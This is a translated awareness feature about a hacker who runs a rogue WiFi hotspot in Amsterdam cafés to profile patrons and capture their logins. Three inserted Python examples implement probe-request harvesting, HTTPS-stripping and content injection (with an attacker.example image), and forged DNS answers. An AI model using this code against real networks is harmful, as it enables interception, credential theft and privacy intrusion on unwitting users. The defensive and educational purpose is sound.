Maybe Better If You Don’t Read This Story on Public WiFi.

We took a hacker to a café and, in 20 minutes, he knew where everyone else was born, what schools they attended, and the last five things they googled.


By Maurits Martijn, from De Correspondent
Translated from Dutch by Jona Meijers
Illustrations by Kristina Collantes




In his backpack, Wouter Slotboom, 34, carries around a small black device, slightly larger than a pack of cigarettes, with an antenna on it. I meet Wouter by chance at a random cafe in the center of Amsterdam. It is a sunny day and almost all the tables are occupied. Some people talk, others are working on their laptops or playing with their smartphones.
Wouter removes his laptop from his backpack, puts the black device on the table, and hides it under a menu. A waitress passes by and we ask for two coffees and the password for the WiFi network. Meanwhile, Wouter switches on his laptop and device, launches some programs, and soon the screen starts to fill with green text lines. It gradually becomes clear that Wouter’s device is connecting to the laptops, smartphones, and tablets of cafe visitors.

On his screen, phrases like “iPhone Joris” and “Simone’s MacBook” start to appear. The device’s antenna is intercepting the signals that are being sent from the laptops, smartphones, and tablets around us.
More text starts to appear on the screen. We are able to see which WiFi networks the devices were previously connected to. Sometimes the names of the networks are composed of mostly numbers and random letters, making it hard to trace them to a definite location, but more often than not, these WiFi networks give away the place they belong to.
We learn that Joris had previously visited McDonald’s, probably spent his vacation in Spain (lots of Spanish-language network names), and had been kart-racing (he had connected to a network belonging to a well-known local kart-racing center). Martin, another café visitor, had been logged on to the network of Heathrow airport and the American airline Southwest. In Amsterdam, he’s probably staying at the White Tulip Hostel. He had also paid a visit to a coffee shop called The Bulldog.

Session 1:

Let everyone connect to our fake network




The waitress serves us our coffee and hands us the WiFi password. After Slotboom is connected, he is able to provide all the visitors with an internet connection and to redirect all internet traffic through his little device.
Most smartphones, laptops, and tablets automatically search for and connect to WiFi networks. They usually prefer a network they have connected to before. If you have ever logged on to the T-Mobile network on the train, for example, your device will keep asking whether a T-Mobile network is nearby, and it asks out loud: the request is a radio broadcast that anyone with an antenna can pick up. Newer phones limit this by probing with a blank network name and a randomized hardware address, but a device that still asks for its saved networks by name is announcing where its owner has been.
Slotboom’s device is capable of registering these searches and appearing as that trusted WiFi network. I suddenly see the name of my home network appear on my iPhone’s list of available networks, as well as my workplace, and a list of cafes, hotel lobbies, trains, and other public places I’ve visited. My phone automatically connects itself to one of these networks, which all belong to the black device.
Slotboom can also broadcast a fictitious network name, making users believe they are connecting to the network of the place they are visiting. For example, if a place has a WiFi network whose name consists of random letters and numbers (Fritzbox xyz123), Slotboom can offer a network called Starbucks instead. People, he says, are much more willing to connect to those. Both tricks rely on the networks being open: a saved network that needs a password cannot be impersonated without its key, because the device will not treat an unprotected network with the same name as the one it knows.
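What the device on the table collects first is the list of network names each phone asks for. The following is an added example, not the article's or Slotboom's software: a parser for 802.11 probe-request frames that maps each client to the saved networks it has leaked. The frames, the hardware addresses and the network names are constructed here so the example runs offline; on a real capture you would feed it frames from a monitor-mode interface instead.

```python
"""Parse 802.11 probe requests and list the SSIDs each client is asking for.

Added example (not the article's or Slotboom's software). Frames, MAC addresses
and network names below are constructed for offline use; no radio is involved.
"""
import struct
from collections import defaultdict

MGMT_TYPE = 0
SUBTYPE_PROBE_REQUEST = 4
TAG_SSID = 0
TAG_SUPPORTED_RATES = 1
BROADCAST = b"\xff" * 6


def mac_str(mac: bytes) -> str:
    return ":".join(f"{b:02x}" for b in mac)


def build_probe_request(client_mac: bytes, ssid: str, seq: int = 0) -> bytes:
    """Construct a minimal probe request as a client would send it.

    Header: frame control, duration, addr1 (DA), addr2 (SA), addr3 (BSSID),
    sequence control. Probe requests go to the broadcast address; the body is
    a list of tagged parameters, the first of which is the SSID.
    """
    frame_control = bytes([(SUBTYPE_PROBE_REQUEST << 4) | (MGMT_TYPE << 2), 0x00])
    header = (frame_control + b"\x00\x00" + BROADCAST + client_mac + BROADCAST
              + struct.pack("<H", seq << 4))
    ssid_bytes = ssid.encode("utf-8")
    body = bytes([TAG_SSID, len(ssid_bytes)]) + ssid_bytes
    body += bytes([TAG_SUPPORTED_RATES, 4, 0x82, 0x84, 0x8B, 0x96])  # 1, 2, 5.5, 11 Mbit/s
    return header + body


def parse_probe_request(frame: bytes):
    """Return (client MAC, SSID) for a probe request; None for any other frame.

    An empty SSID is a wildcard ("any network here?") and reveals nothing;
    a non-empty SSID is a directed probe for a network the device remembers.
    """
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != MGMT_TYPE or fc0 >> 4 != SUBTYPE_PROBE_REQUEST:
        return None
    source = frame[10:16]
    body = frame[24:]
    pos = 0
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + length]
        if len(value) < length:
            return None  # truncated tagged parameter: do not trust the frame
        if tag == TAG_SSID:
            return mac_str(source), value.decode("utf-8", errors="replace")
        pos += 2 + length
    return None


def directed_ssids(frames):
    """Map each client MAC to the sorted list of remembered network names it leaked."""
    seen = defaultdict(set)
    for frame in frames:
        parsed = parse_probe_request(frame)
        if parsed and parsed[1]:
            seen[parsed[0]].add(parsed[1])
    return {mac: sorted(names) for mac, names in seen.items()}


# Constructed sample: two clients, one of which only sends wildcard probes.
MAC_A = bytes.fromhex("02aabbccdd01")
MAC_B = bytes.fromhex("02aabbccdd02")
SAMPLE_FRAMES = [
    build_probe_request(MAC_A, "McDonalds Free WiFi", seq=1),
    build_probe_request(MAC_A, "KartCentre-Guest", seq=2),
    build_probe_request(MAC_A, "", seq=3),          # wildcard, leaks nothing
    build_probe_request(MAC_B, "", seq=1),          # a client that never names a network
    b"\x80\x00" + b"\x00" * 22,                      # a beacon header: not a probe, ignored
]

if __name__ == "__main__":
    for mac, names in directed_ssids(SAMPLE_FRAMES).items():
        print(mac, names)
```

The second client never appears in the result: a device that only sends wildcard probes gives the listener nothing to work with, which is exactly what the practical advice (forget networks you no longer use, turn off auto-join for public ones, keep the OS updated so it randomizes probe addresses) buys you.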
We see more and more visitors log on to our fictitious network. The siren song of the little black device appears to be irresistible. Already 20 smartphones and laptops are ours. If he wanted to, Slotboom could now completely ruin the lives of the people connected: He can retrieve their passwords, steal their identity, and plunder their bank accounts. Later today, he will show me how. I have given him permission to hack me in order to demonstrate what he is capable of, though it could be done to anyone with a smartphone in search of a network, or a laptop connecting to a WiFi network.
Everything, with very few exceptions, can be cracked.
The idea that public WiFi networks are not secure is not exactly news. It is, however, news that can’t be repeated often enough. There are currently more than 1.43 billion smartphone users worldwide and more than 150 million smartphone owners in the U.S. More than 92 million American adults own a tablet and more than 155 million own a laptop. Each year the worldwide demand for more laptops and tablets increases. In 2013, an estimated 206 million tablets and 180 million laptops were sold worldwide. Probably everyone with a portable device has once been connected to a public WiFi network: while having a coffee, on the train, or at a hotel.
The good news is that some networks are better protected than others; some email and social media services use encryption methods that are more secure than their competitors. But spend a day walking in the city with Wouter Slotboom, and you’ll find that almost everything and everyone connected to a WiFi network can be hacked. A study from threat intelligence consultancy Risk Based Security estimates that more than 822 million records were exposed worldwide in 2013, including credit card numbers, birth dates, medical information, phone numbers, social security numbers, addresses, user names, emails, names, and passwords. Sixty-five percent of those records came from the U.S. According to IT security firm Kaspersky Lab, in 2013 an estimated 37.3 million users worldwide and 4.5 million Americans were the victim of phishing—or pharming—attempts, meaning payment details were stolen from hacked computers, smartphones, or website users.
Report after report shows that digital identity fraud is an increasingly common problem. Hackers and cybercriminals currently have many different tricks at their disposal, but the prevalence of open, unprotected WiFi networks makes their work extremely easy. The Netherlands National Cyber Security Center, a division of the Ministry of Security and Justice, did not issue the following advice in vain: “It is not advisable to use open WiFi networks in public places. If these networks are used, work or financial related activities should better be avoided.”
Slotboom calls himself an “ethical hacker,” or one of the good guys; a technology buff who wants to reveal the potential dangers of the internet and technology. He advises individuals and companies on how to better protect themselves and their information. He does this, as he did today, usually by demonstrating how easy it is to inflict damage. Because really, it’s child’s play: The device is cheap, and the software for intercepting traffic is very easy to use and is readily available for download. “All you need is 70 Euros, an average IQ, and a little patience,” he says. I will refrain from elaborating on some of the more technical aspects, such as equipment, software, and apps needed to go about hacking people.

Session 2:

Scanning for name, passwords, and sexual orientation




Armed with Slotboom’s backpack, we move to a coffeehouse that is known for the beautiful flowers drawn in the foam of the lattes, and as a popular spot for freelancers working on laptops. This place is now packed with people concentrating on their screens.
Slotboom switches on his equipment. He takes us through the same steps, and within a couple of minutes, 20 or so devices are connected to ours. Again we see their MAC addresses and login history, and in some cases their owners’ names. At my request, we now go a step further.
Slotboom launches another program (also readily available for download), which allows him to extract even more information from the connected smartphones and laptops. We are able to see the specifications of the mobile phone models (Samsung Galaxy S4), the language settings for the different devices, and the version of the operating system used (iOS 7.0.5). If a device has an outdated operating system, there are known “bugs,” holes in its security that have already been published and, in some cases, have exploits available. With this kind of information, an attacker can look up exactly which published vulnerabilities apply to each device and pick the easiest target; whether a working exploit exists for a given version is a separate question, but an unpatched device is where he would start. A sampling of the coffeehouse customers reveals that none of the connected devices have the latest version of the operating system installed. For all these legacy systems, a known bug is listed online.
We can now see some of the actual internet traffic of those around us. We see that someone with a MacBook is browsing the site Nu.nl. We can see that many devices are sending documents using WeTransfer, some are connecting to Dropbox, and some show activity on Tumblr. We see that someone has just logged on to FourSquare. The name of this person is also shown, and, after googling his name, we recognize him as the person sitting just a few feet away from us.
Information comes flooding in, even from visitors who are not actively working or surfing. Many email programs and apps constantly make contact with their servers—a necessary step for a device to retrieve new emails. For some devices and programs, we are able to see what information is being sent, and to which server.
And now it’s getting really personal. We see that one visitor has the gay dating app Grindr installed on his smartphone. We also see the name and type of the smartphone he’s using (iPhone 5s). We stop here, but it would be a breeze to find out whom the phone belongs to. We also see that someone’s phone is attempting to connect to a server in Russia, sending the password along with it unencrypted, which we are able to intercept.

Session 3:

Obtaining information on occupation, hobbies, and relationship problems




Many apps, programs, websites, and types of software make use of encryption. It is there to ensure that the information sent and received by a device is not accessible to unauthorized eyes. Properly implemented encryption (TLS, the padlock in the browser) is not something a device on the path can simply decrypt. What it can do, once the user is on Slotboom’s WiFi network, is get around it: keep the user on the plain, unencrypted version of a site before the secure connection is ever made, talk to apps that never check whether the server’s certificate is genuine, or just read the large amount of traffic that is sent without any encryption at all. What follows is an example of the last kind.
To our shared surprise, we see an app sending personal information to a company that sells online advertising. Among other things, we see the location data, technical information of the phone, and information of the WiFi network. We can also see the name (first and last) of a woman using the social bookmarking website Delicious. Delicious allows users to share websites—bookmarks—they are interested in. In principle, the pages that users of Delicious share are available publicly, yet we can’t help feeling like voyeurs when we realize just how much we are able to learn about this woman on the basis of this information.
First we google her name, which immediately allows us to determine what she looks like and where in the coffeehouse she is sitting. We learn that she was born in a different European country and only recently moved to the Netherlands. Through Delicious we discover that she’s been visiting the website of a Dutch language course and she has bookmarked a website with information on the Dutch integration course.
In less than 20 minutes, here’s what we’ve learned about the woman sitting 10 feet from us: where she was born, where she studied, that she has an interest in yoga, that she’s bookmarked an online offer for anti-snore mantras, recently visited Thailand and Laos, and shows a remarkable interest in sites that offer tips on how to save a relationship.
Slotboom shows me some more hacker tricks. Using an app on his phone, he is able to change specific words on any website that is loaded without encryption. For example, whenever the word “Opstelten” (the name of a Dutch politician) is mentioned, people see the word “Dutroux” (the name of a convicted serial killer) rendered on the page instead. We tested it and it works. We try another trick: Anyone loading a website that includes pictures gets to see a picture selected by Slotboom. Both tricks depend on the page travelling over plain HTTP; content inside an encrypted connection cannot be altered on the way. This all sounds funny if you’re looking for some mischief, but it also makes it possible to load images of child pornography onto someone’s smartphone, the possession of which is a criminal offense.
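The word swap and the picture swap above, and the step that has to come before them for a site that normally uses encryption (rewriting its https links to http and dropping the header that tells the browser to insist on encryption), are all edits to a plaintext HTTP response passing through the attacker's device. The following is an added example, not the article's or Slotboom's software, of that rewrite. The response is constructed; bank.example and attacker.example are placeholder hostnames. It also shows the cases where the rewrite must not be attempted, which the narrative does not mention: a compressed or chunked body cannot be edited byte-for-byte without first undoing the encoding.

```python
"""On-path rewriting of a plaintext HTTP response.

Added example (not the article's or Slotboom's software). The response below is
constructed; bank.example and attacker.example are placeholders. Only plain
HTTP can be touched this way; a response inside TLS is opaque to a device on
the path, which is why the https->http downgrade has to happen first.
"""


def split_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status line, [(name, value)], body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP head")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def get_header(headers, name: bytes):
    for n, v in headers:
        if n.lower() == name.lower():
            return v
    return None


def rewritable(status: bytes, headers):
    """None if the body can be edited in place, otherwise the reason it cannot."""
    if not status.startswith(b"HTTP/1."):
        return "not HTTP/1.x"
    ctype = get_header(headers, b"Content-Type") or b""
    if not ctype.lower().startswith(b"text/html"):
        return "not HTML"
    if get_header(headers, b"Content-Encoding"):
        # Editing gzip bytes corrupts the page. An on-path tool avoids this by
        # removing Accept-Encoding from the request so the server sends plain text.
        return "compressed body"
    te = get_header(headers, b"Transfer-Encoding") or b""
    if b"chunked" in te.lower():
        return "chunked body"  # chunk sizes would have to be rewritten too
    return None


def rewrite_response(raw: bytes, replacements, strip_hsts: bool = True) -> bytes:
    """Apply byte substitutions to an HTML body and keep the framing valid."""
    status, headers, body = split_response(raw)
    if rewritable(status, headers) is not None:
        return raw  # pass it through untouched rather than corrupt it
    for old, new in replacements:
        body = body.replace(old, new)
    out = []
    for name, value in headers:
        lname = name.lower()
        if lname == b"content-length":
            value = str(len(body)).encode()  # body size changed; fix the length
        if strip_hsts and lname == b"strict-transport-security":
            continue  # only helps if the browser has not cached the policy already
        out.append(name + b": " + value)
    return status + b"\r\n" + b"\r\n".join(out) + b"\r\n\r\n" + body


# Constructed sample page: a news item with a secure login link and an image.
SAMPLE_BODY = (b"<html><body><p>Minister Opstelten spoke today.</p>"
               b'<a href="https://bank.example/login">Log in</a>'
               b'<img src="/img/photo.jpg"></body></html>')
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                   b"Content-Type: text/html; charset=utf-8\r\n"
                   b"Strict-Transport-Security: max-age=31536000\r\n"
                   b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + b"\r\n"
                   b"\r\n" + SAMPLE_BODY)
GZIP_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                 b"Content-Encoding: gzip\r\nContent-Length: 3\r\n\r\nxyz")

REPLACEMENTS = [
    (b"Opstelten", b"Dutroux"),                                      # the word swap
    (b'src="/img/photo.jpg"', b'src="http://attacker.example/pic.png"'),  # the picture swap
    (b"https://", b"http://"),                                       # the downgrade
]

if __name__ == "__main__":
    print(rewrite_response(SAMPLE_RESPONSE, REPLACEMENTS).decode())
```

The two checks worth taking away are the ones the rewrite itself respects: a browser that already holds a Strict-Transport-Security policy for the bank (or has it preloaded) never sends the plain-HTTP request in the first place, so there is nothing to rewrite, and a body the device cannot decode is passed through rather than mangled.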

Password intercepted


We visit yet another cafe. My last request to Slotboom is to show me what he would do if he wanted to really harm me. He asks me to go to Live.com (the Microsoft email site) and enter a random username and password. A few seconds later, the information I just typed appears on his screen. “Now I have the login details of your email account,” Slotboom says. “The first thing I would do is change the password of your account and indicate to other services you use that I have forgotten my password. Most people use the same email account for all services. And those new passwords will then be sent to your mailbox, which means I will have them at my disposal as well.” We do the same for Facebook: Slotboom is able to intercept the login name and password I entered with relative ease.
Another trick that Slotboom uses is to divert my internet traffic. For example, whenever I try to access the webpage of my bank, he has instructed his program to re-direct me to a page he owns: a cloned site that appears to be identical to the trusted site, but is in fact completely controlled by Slotboom. Hackers call this DNS spoofing. Because his device is also the name server the network hands out, there is no race to win: it simply answers the lookup for the bank’s name with the address of his clone. A clone reached over HTTPS would produce a certificate warning in the browser, so this works cleanly only on an unencrypted page or on a victim who clicks past the warning. The information I entered on the site is stored on the server owned by Slotboom. Within 20 minutes he’s obtained the login details, including passwords for my Live.com, SNS Bank, Facebook, and DigiD accounts.
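The DNS part of that trick is small enough to show in full. The following is an added example, not the article's or Slotboom's software: it parses a captured DNS query, forges the answer with an address of the attacker's choosing, and then runs the checks an ordinary stub resolver applies to a response, which the forgery passes because anyone who saw the query knows everything those checks look for. The query, the transaction ID, the name bank.example and the address 10.0.0.1 are constructed placeholders.

```python
"""Forge a DNS answer for a captured query, and show why the client accepts it.

Added example (not the article's or Slotboom's software). The query and the
spoofed address are constructed; bank.example and 10.0.0.1 are placeholders.
"""
import ipaddress
import struct

QTYPE_A = 1
QCLASS_IN = 1
HEADER = struct.Struct(">HHHHHH")  # id, flags, qdcount, ancount, nscount, arcount


def encode_name(name: str) -> bytes:
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg: bytes, off: int):
    """Decode a (possibly compressed) name; return (name, offset after it)."""
    labels = []
    while True:
        length = msg[off]
        if length == 0:
            return ".".join(labels), off + 1
        if length & 0xC0 == 0xC0:  # compression pointer to an earlier name
            ptr = struct.unpack_from(">H", msg, off)[0] & 0x3FFF
            tail, _ = decode_name(msg, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        labels.append(msg[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    flags = 0x0100  # RD: recursion desired
    return HEADER.pack(txid, flags, 1, 0, 0, 0) + encode_name(name) + struct.pack(">HH", qtype, QCLASS_IN)


def parse_query(msg: bytes):
    txid, flags, qd, *_ = HEADER.unpack_from(msg, 0)
    name, off = decode_name(msg, HEADER.size)
    qtype, qclass = struct.unpack_from(">HH", msg, off)
    return {"id": txid, "name": name, "qtype": qtype, "question": msg[HEADER.size:off + 4]}


def forge_response(query: bytes, spoof_ip: str, ttl: int = 300) -> bytes:
    """Answer the captured query with an address of the attacker's choosing."""
    q = parse_query(query)
    if q["qtype"] != QTYPE_A:
        raise ValueError("example only forges A records")
    flags = 0x8180  # QR=1, RD, RA, rcode NOERROR
    header = HEADER.pack(q["id"], flags, 1, 1, 0, 0)
    rr = (b"\xC0\x0C"  # name: pointer to the question name at offset 12
          + struct.pack(">HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
          + ipaddress.IPv4Address(spoof_ip).packed)
    return header + q["question"] + rr


def parse_response(msg: bytes):
    txid, flags, qd, an, *_ = HEADER.unpack_from(msg, 0)
    name, off = decode_name(msg, HEADER.size)
    off += 4  # skip qtype/qclass of the echoed question
    answers = []
    for _ in range(an):
        rname, off = decode_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack_from(">HHIH", msg, off)
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            answers.append((rname, str(ipaddress.IPv4Address(rdata)), ttl))
    return {"id": txid, "flags": flags, "name": name, "answers": answers}


def stub_resolver_accepts(query: bytes, response: bytes) -> bool:
    """The checks a plain stub resolver makes: it is a response, the transaction
    ID matches, the question name matches. Whoever saw the query passes all three."""
    q, r = parse_query(query), parse_response(response)
    return bool(r["flags"] & 0x8000) and q["id"] == r["id"] and q["name"] == r["name"]


# Constructed exchange: the phone asks for bank.example, the device answers itself.
CAPTURED_QUERY = build_query(0x1A2B, "bank.example")
SPOOFED_RESPONSE = forge_response(CAPTURED_QUERY, "10.0.0.1")

if __name__ == "__main__":
    print(parse_response(SPOOFED_RESPONSE))
    print("accepted:", stub_resolver_accepts(CAPTURED_QUERY, SPOOFED_RESPONSE))
```

Nothing in the response proves where it came from, which is the point: on an attacker’s network the lookup is not really being spoofed, it is simply being answered by the attacker. The defences live one layer up or down from this exchange: DNSSEC or DNS over HTTPS to a resolver you chose yourself, and, more practically for the person in the café, the browser’s certificate check, which is what the cloned bank site cannot satisfy.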
I will never again be connecting to an insecure public WiFi network without taking security measures.


This article originally appeared in Dutch online journalism platform, De Correspondent. All names in this article are fictitious, except for Wouter Slotboom’s. We handled the intercepted data with the utmost care and erased it immediately after our last meeting.
